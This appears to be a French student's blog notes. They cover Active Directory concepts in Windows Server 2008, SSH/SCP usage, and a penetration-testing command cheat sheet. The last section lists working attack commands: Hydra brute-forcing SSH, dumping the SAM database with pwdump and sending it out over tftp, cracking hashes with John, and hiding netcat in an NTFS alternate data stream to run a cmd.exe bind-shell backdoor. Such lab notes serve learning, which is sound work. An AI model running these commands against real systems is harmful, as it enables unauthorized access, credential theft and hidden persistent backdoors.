Un pas après l’autre

Active directory, implémentation dans Windows Server 2008 du protocole LDAP.

Le service d’annuaire est une base de données contenant des informations hiérarchiques. Elle est optimisée en lecture. L’annuaire peut être structuré de façon géographique ou de façon organisationnelle. On privilégiera la structure géographique pour les très grosses entreprises.

L’accès aux objets de l’annuaire peut se faire par des outils graphiques ou des utilitaires de console. L’accès aux ressources est tributaire des droits d’administration.

Les rôles de services Active Directory

• Directory Service : base de données du domaine
• Certificat Service : rôle permettant de gérer les certificats du domaine
• Federation Service : rôle permettant de contacter un annuaire externe
• Right Management Service : gère les droits d’accès aux fichiers contenant des DRM

AD centralise les objets du domaine, et distribue les serveurs dans le réseau ce qui améliore la tolérance de panne. Tous les contrôleurs de domaine sont maitres, en cas de défaillance, les clients du domaine peuvent contacter un contrôleur de domaine d’un autre site.

L’authentification des utilisateurs du domaine se fait au travers des objets de type compte utilisateur, ils sont stockés dans l’annuaire et comportent les informations sur l’utilisateur.

Les consoles d’administration à distance permettent de gérer un serveur depuis un poste client, anciennement connu sous le nom d’adminpack, elles ont été remplacées par RSAT.

Un contact est différent du compte d’utilisateur dans la mesure ou il comporte des information sur une personne mais ne lui permettra pas de s’authentifier dans le domaine.

La création d’entités peut se faire de façon automatisé avec un script utilisant la commande dsadd.

Les modèles de compte utilisateur permettent de créer un nouveau compte comportant des informations génériques contenues dans le modèle.

On peut rajouter des champs au compte d’utilisateur en utilisant l’utilitaire en ligne de commande.

Les comptes d’ordinateur contiennent les informations sur les ordinateurs membres du domaine, ils permettent de les administrer.

Les conteneurs sont des dossiers dans lesquels on peut mettre des objets. Il est recommandé de déplacer des objets d’un conteneur à l’autre avec l’assistant « envoyer vers ». Ceci afin de ne pas casser les liens des stratégies de groupe appliqués sur les conteneurs.

La console Ad dispose d’une fonction de recherche multicritères pour retrouver des objets de l’annuaire. On peut sauvegarder des requêtes dans l’annuaire pour toujours retrouver des objets sont des critères définis.

Les SID sont des identifiants uniques propre à un objet. La première partie du SID est propre au domaine, la seconde à l’objet.

Les groupes sont des objets logiques dans lesquels on ajoute des objets qui héritent des droits du groupe. Il est aussi possible d’imbriquer des groupes, d’ajouter un groupe à un groupe parent ;

Pour faciliter la gestion des droits sur des ressources dans les onglets sécurité, on choisira de mettre des comptes utilisateurs (ou ordinateurs) dans des groupes, sur lesquels on appliquera les droits des ressources.

Il est aussi possible d’appliquer des Group Policy Object, des stratégies qui configurent les ordinateurs sur les ordinateurs sur lesquelles s’appliquent. Par défaut elles s’appliquent sur des conteneurs qui les transmettent aux ordinateurs et utilisateurs par héritage.

Dans les droits, c’est le plus restrictif qui emporte la priorité, on applique un droit restrictif sur un groupe et le droit autoriser sur un sous-groupe du premier, le droit final sera le « refuser ».

Pour la gestion des fichiers partagés, il existe de types de droits, les droits de sécurité du système de fichier NTFS qui donnent les droits aux utilisateurs connectés directement connectés sur la machine. Puis les droits de partage pour permettent à des utilisateurs ou à des groupes d’accéder aux partages par le réseau. Donc un utilisateur distant doit avoir les droits de sécurité et de partage. Si deux droits opposés sont configurés dans sécurité et partage, c’est le droit le plus restrictif qui sera appliqué.

Les droits peuvent être explicites ou implicite.

Il est possible de lister les droits effectifs d’un utilisateur ou d’un groupe avec l’onglet Permission effectives.

Les GPO se gèrent avec la console Group policy manager. Elles s’éditent dans une arborescence de stratégie classées par thèmes, système réseau bureau etc.

La GPO domain default policy s’applique par défaut sur tous les objets du domaine.

Les GPO peuvent s’appliquer simultanément à plusieurs conteneurs. Sur un conteneur donné, il est possible de voir l’ordre d’application des GPO.

En changeant des variables d’environnement, il est possible de créer des redirections de dossiers, par exemple mapper le dossier « mes documents » vers un partage réseau, et ce de manière transparente.

Les scripts dans le domaine, il est possible de déployer des scripts avec une gpo et de spécifier des déclencheurs, au démarrage et extinction de l’ordinateur ouverture et fermeture de session.

L’application de la stratégie de groupe peut être soumise à des conditions basées sur des requêtes WMI.

La commande gpupdate permet de forcer la ré-application des stratégies de groupe. La commande gpresult permet d’afficher les stratégies de groupe appliquées sur le poste.

Domain services : système centralisé pour gérer les utilisateurs, ordinateurs et ressources d’un réseau. AD est un annuaire centralisé, il peut offrir de l’authentification SSO, sécurité intégrée et extensibilité de l’architecture et des solutions de gestion à distance.

L’authentification permet de vérifier l’identité d’un utilisateur. Il existe deux types d’authentification : interactive logon à l’ouverture de session utilisateur (écran avec ctrl alt suppr), et autorisation pour accéder à une ressource (fenêtre domaine\utilisateur et mot de passe). Si le SSO est mis en place, il n’est plus nécessaire de s’authentifier auprès des ressources après l’interactive logon.

L’autorisation permet de déterminer si un utilisateur authentifié à les droits pour accéder à une ressource. Le serveur donne un jeton à l’utilisateur lors de son authentification, il contient les SID des groupes auxquels l’utilisateur appartient, lorsque l’utilisateur demande l’accès à une ressource elle demande les ACL des droits, et compare les sid des groupes de l’ACL avec ceux du jeton.

Moyens d’administration, consoles mmc, utilitaires en ligne de commande, powershell.

Composants d’AD :

• Data store : dossier sur lequel se trouve les fichiers de la base et les fichiers de log.
• Contrôleur de domaine, serveur qui héberge le rôle AD DS.
• Global catalog server, serveur qui héberge le catalogue global.
• Read Only Domain Controller (RODC), contrôleur de domaine qui heberge une copie en lecture seule de l’AD.

Composants logiques :

• Partition, la base de données de l’AD est segmentée en trois parties, une partie pour le schéma, une autre pour l’infrastructure et une dernière partie pour domaine. Des partitions facultatives d’applications peuvent être ajoutées.
• Schéma, ensemble des règles et définition qui sont utilisés pour créer et modifier des objets.
• Domaine, espace qui stockera les objets de notre ressource. Un serveur AD ne peut heberger qu’un seul domaine.
• Arborescence de domaine,
• Forêt, ensemble des domaines de l’entreprise.
• Unité d’organisation, conteneur logique dans lequel stocker des objets.
• Les trusts ils permettent d’autoriser des utilisateurs d’un domaine d’accéder à un autre domaine. Ils ont une direction afin de déterminer dans quel sens se fait l’approbation, ils peuvent être bidirectionnels. Ils peuvent être transitif, c’est-à-dire qu’un domaine approuvé peut transmettre à un domaine qu’il approuve ses droits sur le premier domaine.

Lancer une connexion ssh, ssh Administrator@192.168.0.1
Télécharger un fichier avec scp, scp username@192.168.126.129:/etc/hosts /tmp
Uploader un fichier avec scp, scp /etc/hosts username@192.168.126.129:
Lancer une connexion sftp, sftp supinfo@192.168.126.129
Télécharger un fichier avec sftp, get /bin/date /home/supinfo
Uploader un fichier avec sftp, put /home/supinfo/truc /cygdrive/f/truc.txt
Générer une paire de clé ssh rsa, ssh-keygen –t rsa
Utiliser l’agent d’authentification, ssh-agent bash, ssh-add .ssh/id_rsa

Scanning

Scanner avec fping (ICMP), fping –a –r 1 –g 192.168.255.0/24 2>/dev/null
Scanner avec nmap(ARP), nmap –sP 192.168.255.0/24
Scanner un port avec hping(SYN), hping 192.168.255.136 –S –p 80 –c 1
Scanner les ports avec nmap(TCP connect), nmap –sT 192.168.255.136
Scanner les ports avec nmap(SYN), nmap –sS 192.168.255.136
Scanner les ports avec nmap(UDP), nmap –sU 192.168.255.136
Déterminer si un port est firewallé avec hping, hping 192.168.255.136 –A –p 13 –c 1
Lister les protocoles supportés, nmap –sO 192.168.255.136

Fingerprinting

Obtenir des informations sur le système, nmap –v –O 192.168.255.136

Enumeration

Ouvrir une connexion avec le serveur web, nc 192.168.255.136 80
Obtenir la banière du serveur web, HEAD / HTTP / 1.0
Obtenir la version du serveur avec httprint, httprint –h 192.168.255.136 –s ~/enumeration/httprint/signatures.txt
Obtenir la banière ssh, bannergrab 192.168.255.136 22
Enumérer les services snmp, snmpenum 192.168.255.136 public ~/enumeration/snmpenum/windows_snmp.txt

Password cracking

Cracker le mot de passe ssh, Hydra –l Administrator –P~/pwdcracking/dictionaries/dico.txt 192.168.255.136 ssh2
Se logger avec le compte Administrator, ssh Administrator@192.168.255.136
Télécharger pwdump de la machine attaque, tftp –i 192.168.255.136 GET /pwdump/pwdump7.exe, tftp –i 192.168.255.136 GET /pwdump/libeay32.dll
Copier la base sam dans un fichier dump, pwdump7.exe > samdump.txt
Uploader le fichier dump sur la machine attaque, tftp –i 192.168.255.136 PUT samdump.txt
Cracker la base sam avec john, john –incremental samdump.txt

Combiner les fichiers passwords et shadow, unshadow /etc/passwd /etc/shadow > unshadowed.passwd
Cracker les fichiers passwords, john –incremental unshadowed.passwd
Supprimer les mots de passes déjà crackés par john, Rm /home/root/.john/john.pot

System hacking

Cacher la backdoor dans un fichier log, Type nc.exe > log.txt:backdoor.exe
Lancer la backdoor, Start c:\log.txt:backdoor.exe –L –p 1234 –d –e cmd.exe
Verifier que le port est ouvert depuis la cible, netstat –a
Vérifier que le port est ouvert depuis l’attaquant, nmap –sS 192.168.255.136 –p 1234
Créer une connexion avec la backdoor, nc 192.168.255.126 1234

Bienvenue dans WordPress. Ceci est votre premier article. Modifiez-le ou supprimer-le, puis lancez-vous !